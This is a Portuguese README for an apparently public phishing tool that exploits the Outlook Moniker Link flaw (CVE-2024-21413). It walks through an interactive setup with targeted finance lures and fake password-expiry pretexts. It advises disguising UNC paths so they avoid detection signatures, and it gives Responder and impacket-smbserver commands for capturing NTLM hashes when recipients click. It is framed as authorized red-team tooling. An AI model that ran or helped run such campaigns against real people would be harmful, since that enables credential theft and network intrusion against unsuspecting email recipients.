
Uma ferramenta de pesquisa em segurança para simular campanhas de phishing direcionadas usando CVE-2024-21413 (Moniker Link).
Uma ferramenta de pesquisa em segurança para simular campanhas de phishing direcionadas usando a vulnerabilidade CVE-2024-21413 Moniker Link. Projetada para operações de red team autorizadas, testes de penetração e treinamento de conscientização em segurança.
O BLIND TRUST é um framework de engajamento de phishing que ajuda equipes de segurança a entender e testar suas defesas contra ataques sofisticados baseados em e-mail. Ele aproveita a técnica Moniker Link para contornar o Modo de Exibição Protegida do Outlook, proporcionando uma simulação de ataque realista que as organizações podem usar para fortalecer sua postura de segurança.
Esta ferramenta automatiza o fluxo de trabalho de campanha de ponta a ponta — da configuração à entrega de e-mail — mantendo a segurança operacional por meio de caminhos UNC personalizáveis e opções flexíveis de pretexto.
As organizações precisam entender técnicas de ataque reais para se defenderem de forma eficaz. O TRUST permite:
.txt no estilo wordlist# Clone o repositório
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# Execute a ferramenta
python3 TRUST_v7.py
A ferramenta usa apenas módulos da biblioteca padrão do Python:
getpass - Entrada segura de senha
html - Escape HTML
ipaddress - Validação de endereço IP
logging - Registro estruturado de logs
os - Operações de arquivo
re - Expressões regulares
signal - Tratamento de sinais
smtplib - Protocolo de e-mail SMTP
sys - Utilitários do sistema
time - Operações de tempo
dataclasses - Modelagem de configuração
email - Construção de e-mail MIME
typing - Dicas de tipo
Nenhum pacote externo é necessário — funciona em qualquer lugar com Python 3.7+.
python3 TRUST_v7.py
Siga o assistente interativo por 5 etapas:
Carregar alvos de [f]ile ou [i]nput diretamente?: i
Endereço(s) de e-mail do alvo: [email protected], [email protected]
Assunto do e-mail [Security Update Required]: Urgente: Aviso de Expiração de Senha
Nome de exibição (campo De) [Microsoft Security Center]: Equipe de Segurança de TI
Texto do corpo do e-mail: Sua senha expira em 24 horas. Atualize imediatamente.
Host UNC (IP ou domínio) [192.168.1.100]: it-internal.company.com
Nome do compartilhamento UNC [updates]: patches
Nome do exploit UNC [patch]: kb_security_2024
Crie targets.txt:
# Departamento Financeiro
[email protected]
[email protected]
[email protected]
# Contabilidade
[email protected]
[email protected]
Depois execute:
Carregar alvos de [f]ile ou [i]nput diretamente?: f
Caminho para o arquivo de alvos: targets.txt
[+] 5 alvo(s) carregado(s) de targets.txt
Assunto do e-mail: Revisão Financeira do 3º Trimestre - Ação Necessária
Nome de exibição: Equipe de Operações Financeiras
Corpo do e-mail: Por favor, revise a demonstração financeira do 3º trimestre em anexo e forneça a aprovação.
Host UNC: finance-internal.company.com
Compartilhamento UNC: quarterly
Exploit UNC: q3_financial_report
Caminho UNC gerado: file://finance-internal.company.com/quarterly!q3_financial_report
Duas opções:
.txt com um e-mail por linha, comentários começando com #É aqui que você evita assinaturas óbvias:
finance-internal.company.com) em vez de apenas um IPquarterly, updates, documentsq3_report, security_patch, training_documentResultado: Em vez do óbvio \\192.168.1.100\share!exploit, você obtém algo como file://finance-internal.company.com/quarterly!q3_report.
Início
↓
[ETAPA 1] Solicitar e-mail do atacante e senha SMTP
↓
[ETAPA 2] Solicitar IP do listener SMB
↓
[ETAPA 3] Carregar e-mails dos alvos (arquivo ou entrada)
↓
↓→ Para cada alvo:
│ - Validar formato do e-mail
│ - Verificar duplicatas
│
[ETAPA 4] Solicitar pretexto do e-mail
│ - Assunto, nome do remetente, texto do corpo
│
[ETAPA 5] Solicitar personalização do caminho UNC
│ - Host, compartilhamento, nome do exploit
│
↓
[CONSTRUIR] Construir objeto de configuração
↓
[VALIDAR] Verificar se todos os campos estão presentes e válidos
↓
[RESUMO] Exibir resumo pré-envio para revisão
↓
[CONFIRMAR] Usuário aprova ou cancela
↓
[ENVIAR] Para cada alvo:
│ - Construir e-mail MIME com Moniker Link personalizado
│ - Tentar entrega SMTP com lógica de nova tentativa
│ - Registrar sucesso/falha por alvo
│
↓
[RELATÓRIO] Exibir resultados da campanha (entregues vs. falhas)
↓
Sair
CVE-2024-21413 (Moniker Link) é uma vulnerabilidade do Outlook que permite incorporar URLs file:// com um caractere !. Quando um usuário clica nesse link, o Outlook tenta acessar o caminho UNC, acionando uma tentativa de autenticação NTLM mesmo no Modo de Exibição Protegida.
\\host\share!exploit! contorna o Modo de Exibição ProtegidaO TRUST automatiza a fase de entrega:
Solução: Verifique as credenciais SMTP. Para Gmail, use uma senha de app. Para e-mail corporativo, fale com o administrador de SMTP.
Solução: Normal para alguns servidores SMTP. A conexão prosseguirá sem criptografia TLS.
Solução: Garanta que os e-mails nos arquivos wordlist estejam completos e em formato válido ([email protected]).
Solução: O endereço de e-mail não existe no servidor de destino, ou o servidor está bloqueando relay da sua conta.
Solução: Verifique se o caminho do arquivo está correto e se o arquivo existe no seu diretório atual.
P: Esta ferramenta é legal de usar? A: Somente com autorização escrita explícita da organização que você está testando. Phishing não autorizado é ilegal. Sempre tenha um escopo de trabalho e regras de engajamento por escrito.
P: Isso pode contornar filtros de e-mail avançados? A: É uma simulação realista, mas a segurança de e-mail moderna ainda pode detectá-la. Esse é o objetivo — se os filtros da sua organização falharem contra isso, você tem um problema a resolver.
P: Por que personalizar o caminho UNC?
A: O \\IP\share!exploit original é um indicador evidente. Atacantes reais usam caminhos realistas. Sua equipe de segurança deve detectar tanto indicadores óbvios quanto sutis.
P: Posso usar isso para treinar funcionários? A: Sim. Após testes autorizados, use exemplos de campanha sanitizados no treinamento de conscientização em segurança para mostrar aos funcionários técnicas de ataque reais.
P: Isso captura credenciais? A: Não. O TRUST apenas entrega o e-mail. Você precisa de um listener SMB separado (Responder, impacket-smbserver etc.) para capturar hashes NTLM quando os alvos clicam no link.
P: Como configuro um listener SMB? A: Use o Responder no Linux ou o impacket-smbserver:
# Responder (captura hashes)
sudo responder -i eth0 -v
# impacket-smbserver (simulação de servidor de arquivos)
impacket-smbserver Share /tmp -smb2support
Esta ferramenta é apenas para testes de segurança autorizados.
Ao usar o TRUST, você reconhece que entende as implicações legais e possui autorização adequada.
Este projeto é lançado sob a Licença MIT com a adição de uma restrição de uso. Consulte LICENSE para detalhes.
Este projeto é baseado e inspirado na pesquisa e implementação originais do CVE-2024-21413 por CMNatic (https://github.com/cmnatic).
O CMNatic merece crédito total por:
Este repositório representa uma versão modificada e estendida desse trabalho, com melhorias incluindo:
Consulte CREDITS.md para atribuição mais detalhada.
H1SS - Estendeu e manteve esta versão para pesquisa em segurança e testes autorizados.
Contribuições são bem-vindas. Por favor, garanta que quaisquer mudanças:
Consulte CONTRIBUTING.md para diretrizes.
Para problemas, dúvidas ou sugestões, abra uma issue no GitHub.
Lembre-se: Esta ferramenta é um projeto de pesquisa. Use-a de forma responsável, legal e ética.